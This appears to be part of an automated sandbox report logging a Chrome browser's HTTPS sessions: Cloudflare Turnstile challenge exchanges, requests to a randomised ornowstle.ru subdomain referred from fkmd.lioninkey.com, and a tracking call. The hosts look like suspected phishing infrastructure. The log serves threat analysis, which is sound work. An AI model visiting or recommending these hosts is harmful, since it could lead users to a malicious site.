                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46b899c04635-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:49 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      48192.168.2.1649788104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 33571
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: 7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC16384OUTData Raw: 76 5f 38 64 37 64 34 36 38 35 65 64 62 66 32 65 36 34 3d 24 5a 41 65 4b 53 78 66 44 79 41 78 5a 32 56 2d 67 78 4b 6b 47 54 79 78 50 6b 55 6b 78 71 32 79 6b 33 6b 71 71 53 56 78 47 47 6b 43 25 32 62 6b 32 30 66 6b 24 6b 65 31 58 6e 6a 78 6f 2d 52 6b 32 46 78 39 6b 4c 54 6b 65 6b 77 6a 6b 73 58 53 35 47 63 45 6b 6b 76 6b 41 58 53 4c 66 6b 6a 4c 31 31 53 24 65 2d 6a 6b 33 65 54 79 6a 52 6b 79 58 45 6d 59 64 45 71 78 4c 6b 68 63 76 68 4f 59 6b 54 44 6b 55 78 67 58 2d 4c 6b 38 45 45 65 6b 2d 54 6b 6b 6c 45 6b 61 52 65 78 6c 55 6b 6b 61 66 33 41 56 39 76 32 67 75 6b 2d 4e 54 6b 6b 35 6d 55 6e 4d 45 71 6b 67 52 46 68 69 66 34 32 4c 47 53 4b 56 6b 36 39 61 47 44 4c 4c 6b 6b 5a 6b 46 35 4c 67 4b 78 4a 48 6c 45 4c 67 68 63 58 51 77 31 56 6b 35 33 56 24 52 33 6d 30
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d4685edbf2e64=$ZAeKSxfDyAxZ2V-gxKkGTyxPkUkxq2yk3kqqSVxGGkC%2bk20fk$ke1Xnjxo-Rk2Fx9kLTkekwjksXS5GcEkkvkAXSLfkjL11S$e-jk3eTyjRkyXEmYdEqxLkhcvhOYkTDkUxgX-Lk8EEek-TkklEkaRexlUkkaf3AV9v2guk-NTkk5mUnMEqkgRFhif42LGSKVk69aGDLLkkZkF5LgKxJHlELghcXQw1Vk53V$R3m0
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC16384OUTData Raw: 47 6d 54 6d 78 4c 78 33 65 38 41 6b 72 72 6b 78 69 78 4e 65 69 6b 31 6b 66 71 24 68 78 59 41 72 45 43 41 53 36 49 2b 42 57 48 53 49 6b 6b 2d 41 65 53 44 6b 68 65 24 65 6b 5a 6b 65 2b 6e 4b 68 76 6b 2d 6b 24 71 78 39 71 55 6b 2d 71 78 75 53 47 6b 54 65 78 66 6b 4d 71 79 41 53 45 6b 79 65 41 70 4e 72 6b 72 65 36 39 6b 65 6b 35 65 2d 44 6b 32 6b 68 65 2d 65 78 49 6b 54 65 24 39 78 6c 6b 56 6b 41 5a 78 75 71 6c 30 6e 71 78 79 78 4f 65 32 71 6b 58 6b 75 58 43 7a 31 6d 65 38 6a 2d 36 44 61 6b 38 6a 79 5a 53 6a 6b 38 6b 6b 30 68 43 6b 78 6b 6b 56 78 50 49 47 65 79 52 6b 4b 65 38 6a 32 65 78 43 6b 57 71 6e 73 78 65 6b 4b 6b 6b 41 78 69 6b 59 65 79 52 6b 69 78 66 5a 47 76 4d 49 6b 49 65 6a 7a 53 4e 6b 41 5a 53 76 6b 4b 65 72 30 65 71 6b 6c 6b 46 58 6a 5a 2b 42 52
                                                                                                                                                                                                                                                                                      Data Ascii: GmTmxLx3e8AkrrkxixNeik1kfq$hxYArECAS6I+BWHSIkk-AeSDkhe$ekZke+nKhvk-k$qx9qUk-qxuSGkTexfkMqyASEkyeApNrkre69kek5e-Dk2khe-exIkTe$9xlkVkAZxuql0nqxyxOe2qkXkuXCz1me8j-6Dak8jyZSjk8kk0hCkxkkVxPIGeyRkKe8j2exCkWqnsxekKkkAxikYeyRkixfZGvMIkIejzSNkAZSvkKer0eqklkFXjZ+BR
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC803OUTData Raw: 6b 71 2d 67 39 37 4f 4d 35 73 6b 79 6c 49 38 57 65 4a 4a 6c 49 73 57 45 4a 77 61 49 6e 57 51 4a 4a 49 78 7a 67 36 50 78 79 6b 53 75 43 54 79 53 71 63 4b 55 44 51 41 4f 41 5a 54 48 6e 5a 6e 50 71 4d 33 30 44 73 6f 51 42 43 61 39 6d 48 56 67 41 6f 78 2d 66 54 64 4c 6c 53 30 59 36 4b 6a 6c 6a 49 58 57 4e 47 4a 4e 49 51 4d 4e 79 6b 41 56 43 57 57 33 4a 32 71 51 58 79 71 6b 69 6b 77 2b 71 6c 41 66 6b 46 6a 36 65 45 5a 65 4f 7a 6a 56 78 35 51 54 6b 6e 32 6a 73 24 4e 73 67 79 24 46 2d 34 72 78 79 24 67 39 6d 71 4a 79 6a 41 56 7a 71 6d 71 53 43 2d 71 45 6b 63 4d 6d 6b 37 71 4d 6c 45 31 2d 5a 4e 64 30 6b 2d 72 38 41 78 77 6a 24 75 77 38 7a 79 64 46 2d 5a 71 6d 4e 67 68 2d 5a 65 24 52 36 77 46 72 7a 69 43 56 62 2d 39 6b 6b 46 73 6a 4d 7a 44 71 69 79 48 48 77 71 48
                                                                                                                                                                                                                                                                                      Data Ascii: kq-g97OM5skylI8WeJJlIsWEJwaInWQJJIxzg6PxykSuCTySqcKUDQAOAZTHnZnPqM30DsoQBCa9mHVgAox-fTdLlS0Y6KjljIXWNGJNIQMNykAVCWW3J2qQXyqkikw+qlAfkFj6eEZeOzjVx5QTkn2js$Nsgy$F-4rxy$g9mqJyjAVzqmqSC-qEkcMmk7qMlE1-ZNd0k-r8Axwj$uw8zydF-ZqmNgh-Ze$R6wFrziCVb-9kkFsjMzDqiyHHwqH
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC1288INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:07 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 4472
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out-s: POwJLamDmvK259G6PYeH0IDT9X+9f5owVTtm+nGKAfkbT3iPP44Z0AkQEG6gdGk4e25Xeee2KldiWOHoyBc/yW5MkbrvnR1adjF3fXOl/srp9enOAi4gf80W8K5plvffyY2i6fyCMb11s57jiMpJdsYJ+FWL8eW1ZSG50vXvIWuAXR5w2nlEP6fYaCtRVYgj5PleXPZfIxiRshEq4iqpi1o+VskfyUqB04iE9uYkRbHcMOPH15bHbbaVdhvMFSwAzKLO+rl7k9p5Kspv4/pDvMqZqYiT4jZrXc9eVxIsF8LhnWABQ+p3s3y6VqNC/mgvrGwhUHumOSgz648+5oT3dmS7nM9Vu08P/RjSewRs6rba/s0FB918x65YgFtozvtCbOXDpL7xR/F6PB8iU3YC2G6Hu02/xHRIUIBrzGd5mrV77Xv/uQUU1nZeCNINnTMyhur7xe0TV5dch7d3pdmgEZ/5rSst8GrQDQtFnlNMXYoNyTlPjXbBG48QgFeTIOehT+m/summWoxVW4vZYtHuTMBV6uUVYPFI+yX1EKq2DVjPxicmyvemvNV3uH/KisgJsIESEBxsFcSKKUiJ0OaTFQbIIWP7etkWaG6Bf3x+kSwyL6ZFyCs2KHb5v6zrr8XBM0cvFl/w/I9ERbhpS7HmLVHfmnXAKWpw8P3q0osGuArQFS1Q1TmCnAa024Pmy2FpYJMlj0n1ltBX4KjXyNxYFiBuXzcRPZsRfEwYRZFoklPyhE6F/3in9bI8+jS0Zsa8qubr9GUaDdzaDhQ+8dhSuACTMNd79X6kYzO9oEilihroW/O1ZrsKJ4eWAySZKoxHoSISVzKHm19i1MTbs0OW49zF5CGAe+jR76YkuueJJVg+GfpAxUFUd7TPO7IVmiHz99bg9QJdhH1Zg8+ZPwDeKh98joypIL++vWuIq1yd46LZrGAKkLFQb7Qo+D2Oxa5aLr3l0K5B3lDP9uf3whgcfmPuSk4XDfjJ2YHKW+8hpYKLMeWpF7 [TRUNCATED]
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 61 6c 79 6f 66 53 66 51 53 6c 46 45 35 74 51 72 77 74 2b 33 55 34 6c 55 61 6b 37 65 67 70 5a 47 67 6d 31 75 55 35 31 4b 67 34 34 66 34 52 36 4c 73 38 6b 64 6b 48 46 61 57 45 6d 52 78 36 37 59 43 71 74 74 61 77 52 6e 77 53 74 46 51 42 75 59 7a 55 68 4d 61 63 4c 51 50 6b 55 76 55 39 6e 44 70 61 41 36 64 66 4c 33 37 53 67 45 7a 63 65 31 32 47 52 2f 32 57 55 3d 24 4e 4a 32 6d 4a 76 59 5a 62 63 34 56 66 56 34 54 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 37 64 34 37 32 35 35 39 30 39 32 38 35 31 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: cf-chl-out: alyofSfQSlFE5tQrwt+3U4lUak7egpZGgm1uU51Kg44f4R6Ls8kdkHFaWEmRx67YCqttawRnwStFQBuYzUhMacLQPkUvU9nDpaA6dfL37SgEzce12GR/2WU=$NJ2mJvYZbc4VfV4TServer: cloudflareCF-RAY: 8d7d472559092851-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC1217INData Raw: 64 6c 56 69 6a 59 39 72 61 31 32 4d 6c 6d 74 66 68 49 39 6b 6f 47 47 56 6e 49 78 32 6e 4a 69 46 65 4c 42 70 73 4b 57 31 67 4a 43 6f 72 6e 70 33 71 62 57 76 6b 5a 65 68 65 63 4f 55 6b 73 57 6d 6d 4a 62 4a 71 4b 69 6e 6c 36 65 72 72 63 66 45 30 61 33 57 31 39 6a 45 73 62 75 56 79 4d 75 76 32 71 48 52 31 35 36 6c 74 64 57 31 77 65 69 37 74 64 76 6f 71 61 2b 77 34 36 36 2b 7a 74 4c 4b 77 75 6a 73 35 4d 7a 36 37 38 79 79 32 64 72 64 7a 50 48 53 38 39 62 34 32 75 76 55 2b 39 6f 4a 2b 41 58 72 43 51 6a 6c 43 2f 51 4c 35 77 62 52 45 50 37 38 36 67 38 42 31 4e 55 42 42 42 6f 4a 41 50 55 69 43 77 45 4c 49 43 67 6e 4b 65 51 54 39 43 73 32 43 54 51 6a 44 54 6a 37 42 2f 54 37 2f 45 4d 2f 49 7a 34 59 4e 43 6b 66 4f 42 78 46 4f 45 59 76 47 55 73 6b 4a 52 46 52 4b 45 73
                                                                                                                                                                                                                                                                                      Data Ascii: dlVijY9ra12MlmtfhI9koGGVnIx2nJiFeLBpsKW1gJCornp3qbWvkZehecOUksWmmJbJqKinl6errcfE0a3W19jEsbuVyMuv2qHR156ltdW1wei7tdvoqa+w466+ztLKwujs5Mz678yy2drdzPHS89b42uvU+9oJ+AXrCQjlC/QL5wbREP786g8B1NUBBBoJAPUiCwELICgnKeQT9Cs2CTQjDTj7B/T7/EM/Iz4YNCkfOBxFOEYvGUskJRFRKEs
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC1369INData Raw: 79 37 35 34 41 41 4c 41 77 59 4c 4e 52 4d 51 43 79 6e 31 48 41 30 4b 50 44 63 5a 47 6a 45 55 46 52 38 4f 41 42 38 52 43 68 30 68 51 44 30 6a 4a 69 74 46 48 53 46 56 4c 79 41 31 57 6c 68 56 4d 78 55 5a 55 43 35 68 50 7a 63 79 4d 6c 68 47 52 30 4d 32 4e 30 52 65 62 47 42 47 54 6d 78 67 54 32 56 47 5a 56 52 54 4e 6c 70 62 62 30 39 65 55 30 74 61 67 46 4e 53 50 6c 31 6e 5a 45 4a 63 57 34 43 41 64 31 78 61 68 49 70 79 59 6c 36 4c 61 4a 6c 6a 5a 58 6c 55 64 32 70 33 6b 6d 35 5a 63 6c 78 36 6e 6e 31 67 64 71 53 4b 64 34 4b 74 69 47 69 6f 6b 34 75 6e 6c 34 4b 4e 74 35 4b 79 6b 62 36 65 73 4a 6d 7a 77 4b 2b 66 78 63 43 39 6e 73 65 6a 6f 35 32 38 79 4c 6d 71 72 4e 43 38 6f 71 47 79 6b 71 71 6c 6f 70 6d 71 7a 63 7a 4c 73 71 79 64 31 72 48 6b 30 62 54 42 78 4b 6e 43
                                                                                                                                                                                                                                                                                      Data Ascii: y754AALAwYLNRMQCyn1HA0KPDcZGjEUFR8OAB8RCh0hQD0jJitFHSFVLyA1WlhVMxUZUC5hPzcyMlhGR0M2N0RebGBGTmxgT2VGZVRTNlpbb09eU0tagFNSPl1nZEJcW4CAd1xahIpyYl6LaJljZXlUd2p3km5Zclx6nn1gdqSKd4KtiGiok4unl4KNt5Kykb6esJmzwK+fxcC9nsejo528yLmqrNC8oqGykqqlopmqzczLsqyd1rHk0bTBxKnC
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC1369INData Raw: 6f 77 42 2b 30 71 4c 2f 55 4d 4d 6a 4d 31 4a 6a 6f 33 45 7a 34 2b 45 43 41 42 48 42 4e 47 52 67 49 39 49 78 30 77 49 41 34 66 53 44 39 4e 4c 69 42 55 52 43 55 38 46 6b 59 78 4b 42 6c 5a 50 55 73 63 55 45 46 46 5a 31 4a 6a 53 45 5a 64 57 6d 70 59 49 31 4e 53 4d 48 46 69 4d 57 4a 56 61 54 64 77 4f 44 74 6f 63 33 65 43 63 32 52 68 59 30 46 37 57 6e 70 7a 65 32 36 43 61 58 35 79 59 6f 2b 4e 55 48 36 44 63 30 2b 50 59 35 61 4b 5a 32 64 2f 6b 32 74 76 59 4b 5a 6c 6b 56 70 62 64 6e 75 45 58 34 5a 38 66 34 70 75 67 34 43 69 74 4a 52 75 61 35 47 77 66 4c 6d 5a 66 6e 61 2b 6e 59 42 32 73 73 4f 47 6c 72 57 42 72 4a 71 6a 69 49 2b 43 30 4d 47 68 6e 4d 53 2f 79 4b 47 76 72 59 32 30 71 63 2b 61 6f 4c 6a 54 6f 70 61 62 33 4c 36 79 33 4f 65 71 71 4e 76 58 33 36 37 4b 34
                                                                                                                                                                                                                                                                                      Data Ascii: owB+0qL/UMMjM1Jjo3Ez4+ECABHBNGRgI9Ix0wIA4fSD9NLiBURCU8FkYxKBlZPUscUEFFZ1JjSEZdWmpYI1NSMHFiMWJVaTdwODtoc3eCc2RhY0F7Wnpze26CaX5yYo+NUH6Dc0+PY5aKZ2d/k2tvYKZlkVpbdnuEX4Z8f4pug4CitJRua5GwfLmZfna+nYB2ssOGlrWBrJqjiI+C0MGhnMS/yKGvrY20qc+aoLjTopab3L6y3OeqqNvX367K4
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC517INData Raw: 34 46 76 73 70 4c 42 67 50 50 54 76 37 45 7a 45 64 50 42 46 47 48 68 67 49 53 53 30 49 41 6a 30 6c 45 79 49 74 4e 69 6b 55 52 56 42 44 46 77 38 71 53 54 6b 33 47 55 51 38 46 31 64 56 50 78 39 46 4b 79 74 63 50 6a 63 6d 4f 55 70 63 50 58 52 56 4d 6b 55 76 57 30 6b 33 65 56 70 6f 51 44 4e 65 54 54 70 79 52 45 52 58 5a 6b 56 69 57 45 4e 37 51 56 68 64 5a 59 6c 74 54 5a 42 77 63 49 64 6c 6a 47 64 64 56 46 5a 66 6a 31 69 53 62 58 31 2b 64 49 65 59 65 6f 56 34 69 58 5a 6c 69 58 32 47 6a 49 32 6d 64 6f 53 46 71 34 61 58 68 33 53 61 6c 70 69 76 67 6f 36 52 6b 62 42 39 6c 4b 57 61 67 61 4f 45 75 4b 71 62 69 4b 61 74 72 4e 53 33 6f 72 43 69 72 70 47 31 7a 4c 65 6f 75 61 33 44 71 37 7a 6a 70 72 4c 42 73 72 37 4a 78 64 2f 48 76 37 33 67 77 38 48 4e 76 73 50 48 78 63
                                                                                                                                                                                                                                                                                      Data Ascii: 4FvspLBgPPTv7EzEdPBFGHhgISS0IAj0lEyItNikURVBDFw8qSTk3GUQ8F1dVPx9FKytcPjcmOUpcPXRVMkUvW0k3eVpoQDNeTTpyRERXZkViWEN7QVhdZYltTZBwcIdljGddVFZfj1iSbX1+dIeYeoV4iXZliX2GjI2mdoSFq4aXh3Salpivgo6RkbB9lKWagaOEuKqbiKatrNS3orCirpG1zLeoua3Dq7zjprLBsr7Jxd/Hv73gw8HNvsPHxc


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      49192.168.2.1649789104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:07 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:08 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:08 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out: StWP1JpMRlUcJXPSVDnpzlv23DgTHzhHo5Y=$BYGQ2QBVaj73bA2t
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d472b483f3171-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:08 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      50192.168.2.1649791104.21.49.1994436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:08 UTC676OUTGET /51494063466197438770eThrqYWGTFQAZGGVGCSLIRTIMTBZBRPYKHCCIVWRHXDMIQJYU HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:09 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUSsemFhkVnEvXxjLAqFJEbDxB3jo3D8qgBZMgE5yFkTmsszHwA1Xfsg1EvM2MljY7m4YiFv%2FdEvb1wb0%2FEzJnM3FPSnCeO4Xfto2TiKC7P62tWFHn2Jjr1oepuGdrGvW8Rc9jfv%2F93X4vsDQflUMX446%2FfMBbiaTSS%2Fw79d88S9ITLeik%2BeN%2Fwt8xh4rNkET%2BRgzHxghRIfughD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47313af00c40-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1254&delivery_rate=1849297&cwnd=249&unsent_bytes=0&cid=e43f6afcb01b48e1&ts=954&x=0"
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:09 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 11
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      51192.168.2.1649795104.21.49.1994436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:10 UTC466OUTGET /51494063466197438770eThrqYWGTFQAZGGVGCSLIRTIMTBZBRPYKHCCIVWRHXDMIQJYU HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:11 UTC875INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:11 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWxuSkzm38A3DpuZgL2c1f8v3FbW9evJQrkRJ8Ysj1ZUi%2BBfKfQd%2BG2qRJd33MKCkXDeOOEKUctIWqwOx9bjG3vwVd7rmMuUcvGd5teIk2eetANdVK%2B4kM%2FJdTLNxbMZhewgp6HVTdmNi3Zvx4nFhFi2ndjAMgxpdK9V%2BiuAMuNjMP6na3XDZFdkXDRk%2BhZGNk9gcGs6cltKv4Eg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d473b7b384859-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2452&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1044&delivery_rate=1210702&cwnd=244&unsent_bytes=0&cid=226d389be38bbc90&ts=906&x=0"
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:11 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 11
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      52192.168.2.164983452.208.241.2104436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:14 UTC722OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
